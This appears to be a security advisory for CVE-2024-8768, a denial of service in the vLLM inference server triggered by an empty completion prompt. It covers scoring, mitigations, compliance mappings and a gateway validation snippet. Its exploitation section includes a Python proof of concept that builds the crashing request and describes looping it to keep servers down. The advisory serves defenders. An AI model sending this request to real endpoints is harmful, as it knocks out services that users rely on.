CVE-2024-8768: vLLM: unauthenticated DoS via empty completion prompt

HIGH PoC AVAILABLE CISA: TRACK*
Published September 17, 2024
CISO Take

Any vLLM inference server accessible over the network can be crashed with a single malformed request — no credentials required. If your AI stack uses vLLM for model serving (directly or via an agent framework), patch immediately to the fixed version or add upstream input validation to block empty prompt payloads. This is trivially weaponizable as an availability attack against production inference endpoints.

Risk Assessment

High risk for organizations running exposed vLLM inference APIs. CVSS 7.5 with AV:N/AC:L/PR:N/UI:N means any network-reachable instance is exploitable by an unauthenticated attacker with zero skill. vLLM is widely deployed as the inference backend for production LLM APIs, agent frameworks, and RAG pipelines, significantly broadening the attack surface. No active KEV listing but trivial reproducibility makes exploitation near-certain against unpatched instances.

Severity & Risk

CVSS 3.1
7.5 / 10
EPSS
0.03%
chance of exploitation in 30 days
Higher than 9% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
Medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network
AC Low
PR None
UI None
S Unchanged
C None
I None
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade vLLM to the version containing the fix from PR #7746 immediately. Check the vLLM release notes for the patched version tag.

  2. WORKAROUND (if patching is delayed)

    Deploy an API gateway or reverse proxy (nginx, Envoy, AWS API Gateway) upstream of vLLM that validates prompt fields are non-empty before forwarding requests. A simple 400-response rule on empty/null prompt body is sufficient.

  3. NETWORK CONTROLS

    Restrict vLLM API access to authenticated internal services only. vLLM should never be internet-facing without an auth layer.

  4. DETECTION

    Alert on HTTP 500 responses from vLLM endpoints and on process restart events for the vLLM server process. Repeated 500s from the same source IP are a strong signal.

  5. RATE LIMITING

    Implement per-client rate limiting at the API gateway layer to limit blast radius from abuse.
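The step-2 gateway workaround boils down to one rule: reject any completions request whose prompt is missing, null, or empty before it reaches vLLM. A minimal sketch of that validation rule is below; it is illustrative only, and the field names follow the OpenAI-style completions schema that vLLM exposes, not any official vLLM tooling.

```python
import json

def should_reject(raw_body: bytes) -> bool:
    """Return True if the request should get a 400 instead of being
    forwarded to the vLLM backend (the step-2 workaround rule)."""
    try:
        body = json.loads(raw_body)
    except (ValueError, UnicodeDecodeError):
        return True  # unparseable body: reject rather than forward
    prompt = body.get("prompt")
    if prompt is None:
        return True  # missing or null prompt
    # prompt may be a string, or a list of strings / token ids
    if isinstance(prompt, str):
        return prompt.strip() == ""
    if isinstance(prompt, list):
        return len(prompt) == 0
    return False

# Examples:
# should_reject(b'{"model": "m", "prompt": ""}')   -> True  (return 400)
# should_reject(b'{"model": "m"}')                 -> True  (return 400)
# should_reject(b'{"model": "m", "prompt": "hi"}') -> False (forward to vLLM)
```

The same check can be expressed as an nginx/Envoy body-inspection rule or an API-gateway request validator; the point is that the decision happens upstream of the vLLM process, so a malformed request never reaches the vulnerable code path.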

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.6 - AI system availability and resilience
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to respond to and recover from AI risks MAP 5.1 - Likelihood and magnitude of identified impacts are examined
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2024-8768?

CVE-2024-8768 is an unauthenticated denial-of-service vulnerability in the vLLM inference library: a completions API request with an empty prompt triggers a reachable assertion (CWE-617) and crashes the vLLM API server. Any network-reachable instance can be taken down with a single malformed request, and the attack can be repeated in a loop to prevent service recovery.

Is CVE-2024-8768 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-8768, increasing the risk of exploitation.

How to fix CVE-2024-8768?

1. PATCH: Upgrade vLLM to the version containing the fix from PR #7746 immediately. Check the vLLM release notes for the patched version tag.
2. WORKAROUND (if patching is delayed): Deploy an API gateway or reverse proxy (nginx, Envoy, AWS API Gateway) upstream of vLLM that validates prompt fields are non-empty before forwarding requests. A simple 400-response rule on an empty/null prompt body is sufficient.
3. NETWORK CONTROLS: Restrict vLLM API access to authenticated internal services only. vLLM should never be internet-facing without an auth layer.
4. DETECTION: Alert on HTTP 500 responses from vLLM endpoints and on process restart events for the vLLM server process. Repeated 500s from the same source IP are a strong signal.
5. RATE LIMITING: Implement per-client rate limiting at the API gateway layer to limit the blast radius from abuse.

What systems are affected by CVE-2024-8768?

This vulnerability affects the following AI/ML architecture patterns: LLM inference endpoints, model serving, agent frameworks, RAG pipelines, AI API gateways.

What is the CVSS score for CVE-2024-8768?

CVE-2024-8768 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.03%.

Technical Details

NVD Description

A flaw was found in the vLLM library. A completions API request with an empty prompt will crash the vLLM API server, resulting in a denial of service.

Exploitation Scenario

An adversary identifies a vLLM-powered inference endpoint (via DNS enumeration, Shodan, or internal network scanning). They send a POST request to /v1/completions with an empty string or null prompt field. The server triggers CWE-617 (reachable assertion failure) and crashes. The attacker can automate this in a loop to prevent service recovery. For organizations where vLLM backs a customer-facing AI product or internal copilot, this results in immediate and sustained availability outage. The attack requires no authentication, no AI/ML knowledge, and no special tooling — a simple curl command is sufficient.
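The scenario above amounts to a single unauthenticated POST. A hedged sketch of the malformed request follows; the endpoint URL and model name are placeholders for a lab instance, and this should only be run against systems you own.

```python
import json
from urllib import request

# Hypothetical lab endpoint; any network-reachable unpatched vLLM
# completions API is equivalent.
VLLM_URL = "http://vllm.internal:8000/v1/completions"

def build_crash_request(url: str = VLLM_URL) -> request.Request:
    """Build the POST that triggers the empty-prompt assertion failure
    (CWE-617) on an unpatched vLLM API server."""
    payload = {"model": "placeholder-model", "prompt": ""}  # empty prompt
    return request.Request(
        url,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

# Sending it with request.urlopen(build_crash_request()) requires no
# authentication header; repeating it in a loop keeps the server down.
```

Note that nothing in the request is unusual from a gateway's perspective except the empty prompt field, which is why the upstream validation workaround in the Recommended Action section is effective.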

Weaknesses (CWE)

CWE-617 - Reachable Assertion

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
September 17, 2024
Last Modified
September 20, 2024
First Seen
September 17, 2024

Related Vulnerabilities